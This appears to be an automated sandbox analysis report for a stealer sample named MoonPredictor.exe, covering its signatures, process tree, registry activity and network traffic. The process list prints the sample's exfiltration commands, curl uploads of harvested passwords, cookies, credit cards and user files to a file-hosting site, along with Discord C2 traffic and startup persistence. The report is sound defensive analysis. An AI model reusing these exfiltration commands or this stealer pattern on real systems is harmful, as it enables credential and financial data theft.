Malware Analysis Report

2025-05-05 21:33

Sample ID 240529-q9pr1sgf2t
Target MoonPredictor.exe
SHA256 6fa636aaa6c81a0fc336a2e08dfbdd2d31c54da9a1dd44328f8c997c919644cc
Tags
pyinstaller spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

6fa636aaa6c81a0fc336a2e08dfbdd2d31c54da9a1dd44328f8c997c919644cc

Threat Level: Shows suspicious behavior

The file MoonPredictor.exe was found to be: Shows suspicious behavior.

Malicious Activity Summary

pyinstaller spyware stealer

Reads user/profile data of web browsers

Loads dropped DLL

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Detects Pyinstaller

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 13:57

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 13:57

Reported

2024-05-29 13:58

Platform

win10-20240404-en

Max time kernel

18s

Max time network

20s

Command Line

"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoonPredictor.exe C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1452 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe
PID 1452 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe
PID 948 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe C:\Windows\system32\cmd.exe
PID 948 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe C:\Windows\system32\cmd.exe
PID 2488 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2488 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"

C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.0.906147803\1893837670" -parentBuildID 20221007134813 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6f4a56e-7f05-494e-bf07-1cc008ff0584} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 1808 23262418e58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.1.457057340\966823217" -parentBuildID 20221007134813 -prefsHandle 2152 -prefMapHandle 2148 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {463e25bb-f02d-4077-b7a0-b4f87e8e6324} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 2164 232611f9558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.2.419601715\1102580640" -childID 1 -isForBrowser -prefsHandle 2744 -prefMapHandle 2672 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b71937f-63e3-4b1e-8e28-7f07aa756660} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 2980 232652f6058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.3.1582382032\611746898" -childID 2 -isForBrowser -prefsHandle 3252 -prefMapHandle 3240 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e324d50-9887-402a-a8af-32ea75c06e19} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 3488 23263c46958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.4.2075582435\119602772" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4148 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0891d646-24ee-45ff-b2c8-721f08daf540} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4164 23266a43058 tab

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store1.gofile.io/uploadFile"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.5.1460825049\1895753631" -childID 4 -isForBrowser -prefsHandle 4772 -prefMapHandle 4764 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7310d7e7-b208-4d54-94c8-8fb007babae8} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4800 232675fbc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.6.1703885957\1381724603" -childID 5 -isForBrowser -prefsHandle 4932 -prefMapHandle 4936 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2bcd844-d8cf-430a-b0da-a769fc9a7a7c} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4924 232675fbf58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.7.1066197513\73023151" -childID 6 -isForBrowser -prefsHandle 4800 -prefMapHandle 4704 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f731f79-c6c7-47c6-ab1f-abecd794a564} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5108 23268249858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.8.726074387\271029873" -childID 7 -isForBrowser -prefsHandle 5628 -prefMapHandle 4632 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0afa0caf-b2df-49c2-9cdc-5e0f9687892c} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5680 23267283c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.9.2104782825\18777930" -parentBuildID 20221007134813 -prefsHandle 5820 -prefMapHandle 5804 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b8583cf-5b53-40ee-8fd5-aae620ff6034} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5688 232690bc258 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.10.477575502\1755831304" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5992 -prefMapHandle 5988 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07070499-f44f-4f3e-b13d-82563c2a72cf} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 6004 23269031558 utility

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupReceive.ttc" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupUnregister.clr" https://store1.gofile.io/uploadFile"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.11.671860188\408956740" -childID 8 -isForBrowser -prefsHandle 5368 -prefMapHandle 5288 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {52f650e6-a64d-4529-8ad2-f5d87f8af2c3} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4732 23265263258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.12.1880285698\1255029390" -childID 9 -isForBrowser -prefsHandle 2856 -prefMapHandle 2852 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00bf6b26-94a8-4cfb-89f1-5eeb35e66db1} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4868 2326731a358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.13.824097604\555468084" -childID 10 -isForBrowser -prefsHandle 5156 -prefMapHandle 4732 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {027e6729-4eb2-45e9-9f92-842e92b00422} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 6548 2326759f558 tab

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
N/A 127.0.0.1:49921 tcp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 44.237.98.207:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 44.237.65.238:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 www.google.com udp
US 162.159.138.232:443 discord.com tcp
FR 172.217.20.196:443 www.google.com tcp
US 162.159.138.232:443 discord.com tcp
N/A 127.0.0.1:49929 tcp
US 8.8.8.8:53 238.65.237.44.in-addr.arpa udp
US 8.8.8.8:53 196.20.217.172.in-addr.arpa udp
FR 172.217.20.196:443 www.google.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 www.google.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
